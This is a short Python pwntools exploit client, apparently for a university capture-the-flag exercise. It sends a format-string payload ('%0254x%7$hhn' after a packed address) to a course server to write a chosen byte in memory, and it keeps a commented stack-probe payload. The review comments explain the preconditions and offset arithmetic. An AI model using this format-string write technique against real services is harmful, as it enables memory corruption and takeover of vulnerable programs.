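"""Client for the "05_write_specific_byte" format-string exercise.

Sends one payload that makes the service's printf-style call write a single
byte at a fixed address, then echoes whatever the service sends back.

NOTE(review): the target binary is not visible from here. The payload only
works if the service uses the received bytes as the format string itself;
passing input as an argument to a constant format ("%s") removes the
primitive. Confirm against the target source.
"""
from pwn import remote, process, p32

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25195

conn = remote(HOST, PORT)
# Local alternative to the remote service (kept for debugging):
#conn = process("05_write_specific_byte")
#input()  # presumably a pause so a debugger can be attached to the local process

# Packed 32-bit address of the byte to overwrite: offset 3 from 0x804c044.
tgt_addr = p32(0x804c044 + 3)

# %hhn stores the low 8 bits of the number of characters printed so far.
# The 4 address bytes plus 254 padding characters give 258, and 258 % 256 == 2,
# so the byte written is 0x02:  2 + 256 - 4(ptr) = 254
# NOTE(review): "%7$" assumes the start of the input is the 7th argument as
# seen by the format call; the probe payload below is how that is checked.
pl = tgt_addr + b"%0254x%7$hhn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)

# Echo the reply one byte at a time until the peer closes the connection.
while conn.connected():
    try:
        chunk = conn.recv(1)
    except EOFError:
        # The peer closed the socket between the connected() check and recv();
        # stop cleanly instead of ending the script with a traceback.
        break
    if not chunk:
        # recv() returned no data (timeout); indexing [0] would raise IndexError.
        continue
    print(chr(chunk[0]), end="", flush=True)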